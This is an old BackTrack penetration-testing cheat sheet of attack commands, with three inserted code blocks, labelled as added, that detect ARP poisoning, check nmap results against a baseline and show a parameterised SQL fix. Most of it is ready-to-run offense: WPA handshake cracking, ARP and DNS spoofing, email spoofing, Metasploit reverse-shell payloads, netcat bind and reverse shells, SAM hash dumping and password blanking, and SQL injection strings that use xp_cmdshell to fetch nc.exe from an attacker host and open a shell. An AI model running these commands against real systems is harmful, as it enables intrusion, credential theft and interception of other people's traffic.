Backtrack syllabus

Table of Contents

  cracking wpa-psk (with clients)
  connecting via wireless
  starting wicd network manager
  mounting hard drives
  starting whole networking
  working with trash
  killing a process
  adding to autostart in Linux
  checking disk space
  checking kernel version
  checking for usb devices
  checking for installed wifi cards
  scanning with iwlist
  putting wlan0 up
  using metasploit with scan results from Openvas/Nessus
  converting *.nessus file to *.nbe file
  following victim browser with ettercap and MITM
  capturing image from network and displaying in a X Window
  when you get 403:FORBIDDEN, use WGET to spoof browser
  spoofing emails
  configuring Sendmail to send mail from command line
  cracking Speedtouch serial key
  Backtrack COMMANDS:
    Networking:
    Static IP address:
    Services:
    Apache server:
    SSH server:
    TFTP server:
    VNC server:
    Check what ports are listening:
    Basics:
    Mount a local hard drive:
    Mount a Windows network share:
    Edit a file:
    Compile a program:
    Install a new program:
    Footprinting:
    Whois:
    DNS:
    Scanning:
    nmap:
    amap:
    OS Fingerprinting
    Banner Grabbing
    Windows enumeration:
    Using Windows
    smbclient:
    rpcclient:
    ARP Spoofing
    ettercap:
    dns spoofing:
    Exploits
    Metasploit:
    Web Interface:
    Console:
    Interactive sessions:
    Auxiliary scanners:
    Payloads:
    Meterpreter:
    Automated:
    Payload generator:
    What to do after gaining a remote shell
    TFTP
    Netcat
    Passwords
    Physical Access
    SQL Injection
    Alternate Data Streams
    A White Hats Pen Test by Muts

cracking wpa-psk (with clients)

iwconfig                                    checking wireless interfaces
airmon-ng                                   checking monitoring mode
airmon-ng start interface                   activate monitoring mode
airodump-ng --encrypt wpa interface         list all access points using wpa-psk
scan in progress.... keep the information below:
  ESSID (target wireless name)
  BSSID (access point MAC address)
  Station MAC
  Channel
airodump-ng --write sniff.cap --channel 11 --bssid xx:xx --encrypt wpa interface
                                            sniff the channel and log the result in a capture file
aireplay-ng -0 1 -a BSSID -c station MAC interface
                                            force disconnection of the station and catch the handshake
aircrack-ng sniff.cap                       check to see if the handshake was captured
aircrack-ng -c yourcapfile.cap -w yourwordslist.txt
                                            cracking

connecting via wireless

sudo iwconfig eth1 mode managed essid BTHomeHub-6EE6 key 3d357f1954
ifconfig eth1
sudo dhclient eth1
starting wicd network manager

sudo wicd
wicd

mounting hard drives

sudo mount -t ntfs-3g /dev/sdb1 /mnt/BACKUP
sudo mount /dev/sda1 /mnt/WIN
mount /dev/scd1 /mnt/cdrom

starting whole networking

sudo /etc/init.d/networking start

working with trash

apt-get install trash-cli
empty-trash
list-trash
$USERS_HOME/.local/share/Trash/files/       location of the trash folder

killing a process

kill -SIGKILL 5959

adding to autostart in Linux

cd /root/.kde3/Autostart
ln -s /usr/bin/leetmode leetmode            making a link to a program

discus                                      checking disk space
uname -a                                    checking kernel version
lsusb                                       checking for usb devices
dmesg | egrep "rtl|wlan"                    checking for installed wifi cards
iwlist wlan0 scan                           scanning with iwlist
ifconfig wlan0 up                           putting wlan0 up

using metasploit with scan results from Openvas/Nessus

nessus --dot-nessus file.nessus -i "Report Name" -o converted.nbe
                                            converting *.nessus file to *.nbe file
load db_postgres                            loading postgres database matrix
db_create vic1
db_import_nessus_nbe vic1.nbe
db_hosts
db_autopwn
db_autopwn -t -p -e -b                      launch a full scale exploitation
db_autopwn -t -x                            analyse potential vulnerabilities
http://blog.metasploit.com/2006_09_01_archive.html

following victim browser with ettercap and MITM

sudo ettercap -T -Q -M arp:remote -i eth1 /192.168.1.66/ // -P remote_browser

The -T starts it in text mode.
The -Q will make ettercap be superQuiet (not print raw packets in the terminal window).
The -M starts man in the middle mode, and the arp:remote is the type of poisoning, and remote is a parameter for MITM. These commands can be combined into one switch like -TQM, but for clarity I put them separately.
The -i eth1 specifies the network interface and is optional; if you have only one network interface it is probably not needed. In this case, I was on a laptop using a wifi connection to my AP. This works just as well as a wired connection, and takes no other preparation other than being properly associated with the access point.
The /192.168.1.66/ is the victim IP and // means the rest of the segment. I tried it without the // in hopes that it wouldn't have to poison the whole segment, but it didn't seem to work. I know that using ettercap in other ways you can single out one machine without making a lot of noise on the network.
The -P remote_browser is the plugin to follow the victim browser.
When you are done, it is IMPORTANT to end ettercap properly with a q. This re-arps the victims, and restores the network to normal. Be careful with ettercap: you have just potentially poisoned the ARP cache on 255 machines. If you just close the window, you may leave the network in a shambles, and IDS systems may easily point to your IP as a problem child.
http://forum.s-t-d.org/viewtopic.php?id=2594

capturing image from network and displaying in a X Window

sudo driftnet -i eth1
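The ettercap note above says an IDS will easily spot a poisoning run: on the wire it looks like one MAC suddenly answering ARP for the gateway and then for every other host on the segment. This added example (not from the original document) shows that detection logic over constructed tcpdump-style ARP reply lines; the addresses, the gateway IP and the "rogue" MAC are all hypothetical.

```python
"""Spot ARP cache poisoning in ARP reply traffic (added example, not from the original page)."""
import re
from collections import defaultdict

# Constructed sample in the layout of "tcpdump -n -e arp" output; every address is hypothetical.
# 192.168.1.1 is the gateway. From 12:00:05 one MAC (aa:bb:cc:dd:ee:ff) starts answering for
# every host on the segment, which is what an arp:remote poisoning run looks like on the wire.
SAMPLE_LOG = """\
12:00:00.100000 00:11:22:33:44:01 > 00:11:22:33:44:66, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28
12:00:00.300000 00:11:22:33:44:66 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.66 is-at 00:11:22:33:44:66, length 28
12:00:01.000000 00:11:22:33:44:10 > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.10 is-at 00:11:22:33:44:10, length 28
12:00:05.000000 aa:bb:cc:dd:ee:ff > 00:11:22:33:44:66, ethertype ARP (0x0806), length 42: Reply 192.168.1.1 is-at aa:bb:cc:dd:ee:ff, length 28
12:00:05.100000 aa:bb:cc:dd:ee:ff > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.66 is-at aa:bb:cc:dd:ee:ff, length 28
12:00:05.200000 aa:bb:cc:dd:ee:ff > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.10 is-at aa:bb:cc:dd:ee:ff, length 28
12:00:05.300000 aa:bb:cc:dd:ee:ff > 00:11:22:33:44:01, ethertype ARP (0x0806), length 42: Reply 192.168.1.11 is-at aa:bb:cc:dd:ee:ff, length 28
"""

# Timestamp at the start of the line, then the "Reply <ip> is-at <mac>" part.
REPLY_RE = re.compile(r"^(\S+) .*?Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-fA-F:]{17})")


def parse_replies(text):
    """Return (timestamp, ip, mac) triples for every ARP reply line; other lines are ignored."""
    replies = []
    for line in text.splitlines():
        m = REPLY_RE.match(line)
        if m:
            ts, ip, mac = m.groups()
            replies.append((ts, ip, mac.lower()))
    return replies


def detect_poisoning(replies, gateway_ip, max_ips_per_mac=2, allow_many=frozenset()):
    """Return alert strings in order of appearance.

    Two symptoms are checked: an IP whose advertised MAC changes (CRITICAL for the gateway,
    because that is the entry that redirects the victims' traffic), and one MAC that claims
    more IPs than max_ips_per_mac. MACs in allow_many (e.g. a router doing proxy ARP) are
    exempt from the second check so that legitimate proxy-ARP hosts do not alert.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    flagged = set()
    alerts = []
    for ts, ip, mac in replies:
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            level = "CRITICAL" if ip == gateway_ip else "WARNING"
            alerts.append(f"{level} {ts}: {ip} moved from {previous} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if (mac not in allow_many and mac not in flagged
                and len(mac_to_ips[mac]) > max_ips_per_mac):
            flagged.add(mac)
            claimed = ", ".join(sorted(mac_to_ips[mac]))
            alerts.append(f"WARNING {ts}: {mac} claims {len(mac_to_ips[mac])} IPs: {claimed}")
    return alerts


if __name__ == "__main__":
    for alert in detect_poisoning(parse_replies(SAMPLE_LOG), gateway_ip="192.168.1.1"):
        print(alert)
```

The same logic runs unchanged over real `tcpdump -n -e arp` output piped in on stdin; the first alert you should expect from a run like the one above is the gateway's MAC moving.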
when you get 403:FORBIDDEN, use WGET to spoof browser

Spoof the site by using the wget -U option, giving it a user-agent description of another browser.
wget -U "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20070802 SeaMonkey/1.1.4" http://yourURL.com
To see what a working browser sends as a user-agent header, you can run netcat on your localhost, and have a browser try to fetch a page from it:
nc -l -p 8000 -v
Now, in your browser, go to http://localhost:8000

spoofing emails

/etc/init.d/sendmail start
sendEmail -f 123@123.com -m "welcome to the matrix" -t napoleon182@interia.pl
sendEmail -f xxxx1@gmail.com -t xxxxx2@mailinator.com -u testsubject -m testmessage -s smtp.gmail.com:465 -o tls=yes -xu xxxxx3 -xp ****(password)
                                            if port 465 is no good, try 587

configuring Sendmail to send mail from command line

http://www.ping.co.il/node/2/

cracking Speedtouch serial key

http://www.nickkusters.com/SpeedTouch.aspx

Backtrack COMMANDS:

Networking:
dhclient                                    get a new IP address

Static IP address:
ifconfig eth0 192.168.0.100/24              set IP address & subnet mask
route add default gw 192.168.0.1            set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf
                                            set DNS server

Services:

Apache server:
apachectl start
apachectl stop

SSH server:
sshd-generate
/usr/sbin/sshd
pkill sshd
ssh user@targetIP

TFTP server:
atftpd --daemon --port 69 /tmp/
pkill tftpd

VNC server:
vncserver                                   start server on TCP port 5901
pkill Xvnc

Check what ports are listening:
netstat -ant                                show listening TCP ports
netstat -anu                                show listening UDP ports
netstat -ant | grep 22                      verify ssh has started
netstat -anu | grep 69                      verify tftp has started

Basics:

Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1

Mount a Windows network share:
share <user> <targetIP> <remote share>
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share

Edit a file:
nano test.sh                                create a new file and open it
<ctrl> x                                    exit
y                                           save modified buffer
<enter>                                     write changes
chmod 755 test.sh                           make the file executable
./test.sh                                   run the file

Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom

Install a new program:
tar zxvf program.tar.gz
cd to the new program folder
method 2: bzip2 -cd program.tar.bz2 | tar xvf -
./configure
make
su root
make install

Footprinting:

Whois:
whois target.com                            contact info, emails, dates, name servers
ping www.target.com                         IP address of web server
whois targetIP                              network range

DNS:
dig target.com any
A      host                                 maps a domain to an IP address
PTR    pointer                              maps an IP address to a domain
NS     name server                          server name for a delegated zone
SOA    start of authority                   zone transfer and record caching
SRV    service locator                      used to locate services in the network
MX     mail                                 SMTP server
host -l target.com <name server>            zone transfer
http://centralops.net/
http://clez.net/net.app
http://www.robtex.com/
http://serversniff.net/

Scanning:
scanrand -b10M targetIP:quick
nmap:
-sS                                         TCP SYN scan or Stealth, half open (default)
-sT                                         TCP full connect (very noisy)
-sU                                         UDP scan
-PS                                         SYN packet discovery (best against stateful firewalls)
-PA                                         ACK packet discovery (best against stateless firewalls)
-PN                                         don't ping
-n                                          no reverse DNS lookup
-A                                          combines -O and -sV
-O                                          OS fingerprinting
-sV                                         service version (banner)
-p                                          ports to scan (T:port,U:port)
-T                                          timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL                                         input list of hosts to scan
-oG                                         grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p <open ports> -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP

amap:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt

OS Fingerprinting
p0f -i eth0 -U -p                           use interface eth0, don't display unknown signatures, promiscuous
point a browser to the targetIP             read traffic on p0f
xprobe2 targetIP

Banner Grabbing
nc targetIP port                            check if the port is open
nc 10.1.1.2 80
telnet targetIP port                        telnet may yield slightly different results
HEAD / HTTP/1.0
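The scan.txt that nmap's -oG option writes (and that amap reads above) is a tab-separated, one-host-per-line format whose port entries are seven slash-terminated fields. This added example (not from the original document) parses it and then does the defender's version of "check for services on uncommon ports": it compares the open ports against a per-host baseline of what should be exposed. The hosts, ports and version strings in the sample are constructed.

```python
"""Parse nmap grepable (-oG) output and compare it with an expected-services baseline
(added example, not from the original page)."""
import re

# Constructed sample in nmap's -oG layout; hosts, ports and versions are hypothetical.
SAMPLE_OG = """\
# Nmap 4.20 scan initiated as: nmap -sS -PN -n -sV -oG scan.txt 10.1.1.0/24
Host: 10.1.1.2 ()\tStatus: Up
Host: 10.1.1.2 ()\tPorts: 80/open/tcp//http//Apache httpd 2.0.52/, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-term-serv///\tIgnored State: closed (996)
Host: 10.1.1.5 ()\tStatus: Up
Host: 10.1.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.3/, 8080/open/tcp//http-proxy///, 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2000/\tIgnored State: closed (997)
# Nmap done -- 256 IP addresses (2 hosts up) scanned
"""

# One port entry is port/state/protocol/owner/service/rpc-info/version/ (seven fields, each
# terminated by a slash); entries inside the Ports: field are separated by ", ".
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_grepable(text):
    """Return {ip: [port dicts]} for every Host: line; a host with no Ports: field maps to []."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and anything else
        fields = line.split("\t")
        ip = fields[0].split()[1]
        ports = hosts.setdefault(ip, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                m = PORT_RE.fullmatch(entry.strip())
                if m is None:
                    continue  # malformed entry: skip rather than guess
                port, state, proto, _owner, service, _rpc, version = m.groups()
                ports.append({"port": int(port), "state": state, "proto": proto,
                              "service": service, "version": version})
    return hosts


def open_ports(hosts, ip):
    """Sorted open ports for one host; filtered and closed ports are excluded."""
    return sorted(p["port"] for p in hosts.get(ip, []) if p["state"] == "open")


def unexpected_open_ports(hosts, baseline):
    """Open ports that are not in baseline ({ip: set of expected ports}).

    A host missing from the baseline is reported with everything it exposes, which is the
    case a defender most wants to see: a machine nobody has inventoried."""
    findings = {}
    for ip in hosts:
        extra = [p for p in open_ports(hosts, ip) if p not in baseline.get(ip, set())]
        if extra:
            findings[ip] = extra
    return findings


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_OG)
    expected = {"10.1.1.2": {80, 139, 445}, "10.1.1.5": {22}}  # constructed baseline
    for ip, ports in unexpected_open_ports(scan, expected).items():
        print(ip, "unexpected open ports:", ports)
```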
<enter 2x>
wget targetIP                               downloads the index.html file
cat index.html | more                       view file one page at a time, space bar for next page
q                                           exit file

Windows enumeration:
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP                         check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP                name, OS and workgroup
smbdumpusers -i targetIP                    list users
smbclient -L //targetIP                     list shares

Using Windows
net use \\targetIP\ipc$ "" /u:""            start a NULL session
net view \\targetIP                         view shares

smbclient:
smbclient -L hostName -I targetIP           enumerate shares
smbclient -L hostName/share -U ""           connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin  connect to open share with user name admin

rpcclient:
rpcclient targetIP -U ""                    start a NULL session
netshareenum                                enumerate shares
enumdomusers                                enumerate users
lsaenumsid                                  enumerate domain SIDs
queryuser RID                               user info, try 500, 501, 1000, 1001
createdomuser                               create user account

ARP Spoofing

ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0

dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing

Exploits
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux. You can identify the environment by inspecting the headers.
cat exploit | grep "#include"
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u

Metasploit:
svn update                                  update framework

Web Interface:
./msfweb
Console:
./msfconsole
help
show <option>
search <name>
use <exploit name>
show options
set <OPTION NAME> <option>
show payloads
set PAYLOAD <payload name>
show options
set <OPTION NAME> <option>
show targets
set TARGET <target number>
exploit

Interactive sessions:
sessions -l                                 list active sessions
sessions -i <ID>                            sessions -i 4, interact with session 4
sessions -k <ID>                            sessions -k 4, kill session 4
<ctrl> z                                    background a session
<ctrl> c                                    kill a session
jobs                                        list exploit jobs running
jobs -K                                     kill all jobs

Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login

Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell

Meterpreter:

Automated:
db_import_nessus_nbe                        import Nessus results in NBE format
db_import_nmap_xml                          import nmap results in XML format (-oX)
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest                          delete old database called pentest
db_create pentest                           create a new database called pentest
db_nmap targetIP                            run nmap through the framework and store results in database
db_hosts                                    show hosts discovered
db_services                                 show services running on each host
db_autopwn                                  show options
db_autopwn -t -p -e                         select modules based on open ports, show matching exploits, exploit

Command Line Interface:
./msfcli | grep -i <name>                   search for an exploit or auxiliary
./msfcli <exploit or auxiliary> S           summary info
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

Payload generator:
./msfpayload <payload> <variable=value> <output type>
S                                           summary and options of payload
C                                           C language
P                                           Perl
y                                           Ruby
R                                           Raw, allows payload to be piped into msfencode and other tools
J                                           JavaScript
X                                           Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe

Encode shellcode:
./msfencode <options> <variable=value>
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c

What to do after gaining a remote shell
hostname
net users
net user x hack /add
net user x /add
net localgroup
net localgroup administrators
net localgroup administrators x /add
Don't use interactive programs like FTP from a remote shell.

TFTP
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with read only attributes. So to delete the file:
attrib -r nc.exe
del nc.exe

Netcat
attacker: 10.1.1.1
target: 10.1.1.2

Port scanner:
nc -v -z 10.1.1.2 1-1024                    scan ports 1 to 1024

Chat session:
target: nc -lvp 4444                        start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444

Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 < test.txt

Bind shell:
target: nc -lvp 4444 -e cmd.exe             should be sitting at a command prompt of the target
attacker: nc -v 10.1.1.2 4444

Reverse shell:
target: nc -lvp 4444
attacker: nc -v 10.1.1.2 4444 -e /bin/bash
The target should be sitting at an invisible command prompt of the attacker. You will not see a prompt. Issue any linux command to verify.

Passwords

Word list:
zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP

WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf
-f switch will read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more

SAM file:
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair                         backup copy not locked by the OS

Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\windows\system32
meterpreter > execute -f cmd -c
meterpreter > interact x                    where x is the channel created
C:\WINDOWS\system32> pwdump 127.0.0.1

John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt

Physical Access

Mount a NTFS share in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1

Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt

Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
umount /mnt/sda1
reboot

SQL Injection

nmap -sS -p 1521 targetIP                   Oracle
nmap -sS -p T:1433,U:1434 targetIP          MS SQL

Release:
SQL Server 2000 RTM
SQL Server 2000 SP1
SQL Server 2000 SP2
SQL Server 2000 SP3
SQL Server 2000 SP3a
SQL Server 2000 SP4
SQL Server 2005 RTM
SQL Server 2005 SP1
SQL Server 2005 SP2

Authentication bypass:
or 1=1--                                    minus minus closes the SQL query, everything after it is ignored

Enumerating table names:
having 1=1--
group by table having 1=1--
group by table, table2 having 1=1--
group by table, table2, table3 having 1=1--

Enumerating column types:
union select sum(column) from table --
union select sum(column2) from table --

Adding data:
; insert into table values(value,value2,value3)--

MS SQL stored procedure:
Output the database info into an html file, that you can view with a browser.
; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --
www.target.com/test.html
Run ipconfig on target and write to a file, that you can view with a browser.
or 1=1; exec master..xp_cmdshell "ipconfig" > c:\Inetpub\wwwroot\test.txt ;--
www.target.com/test.txt
Upload netcat and spawn a reverse shell.
or 1=1; exec master..xp_cmdshell "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe ; --
attacker: nc -lvp 53

Alternate Data Streams

Hide netcat inside a text file. Note netcat must be located in the current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe

A White Hats Pen Test by Muts

nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit config file to open more ports on the router, 135,139,445,1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe 127.0.0.1 > hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server.
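The "or 1=1--" authentication bypass in the SQL Injection section above works only because the login code pastes user input into the SQL text, where "--" comments out the rest of the query. This added example (not from the original document) puts that vulnerable login beside the parameterised form that closes it, using a constructed in-memory SQLite table; the table, user row and password are hypothetical.

```python
"""The or 1=1-- login bypass beside the parameterised fix (added example, not from the original page)."""
import sqlite3

# The bypass input from the page: closes the string, ORs in a true condition, comments out the rest.
BYPASS = "' or 1=1--"


def make_db():
    """Constructed sample database with one user row.

    The password is stored in clear text only to keep the example short; a real login
    table stores a salted hash and the query compares against that."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query with string formatting, so the input is parsed as SQL.

    With username = BYPASS the statement becomes
      ... WHERE username = '' or 1=1--' AND password = '...'
    and the password check is commented away."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data only, never SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run both logins with a legitimate credential and with the bypass input."""
    conn = make_db()
    return {
        "vulnerable_legit": login_vulnerable(conn, "admin", "correct-horse"),
        "vulnerable_bypass": login_vulnerable(conn, BYPASS, "wrong"),
        "safe_legit": login_safe(conn, "admin", "correct-horse"),
        "safe_bypass": login_safe(conn, BYPASS, "wrong"),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:18s} -> {result!r}")
```

The same substitution defeats the "having 1=1--" and "union select" probes listed above, because none of the input ever reaches the SQL parser.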
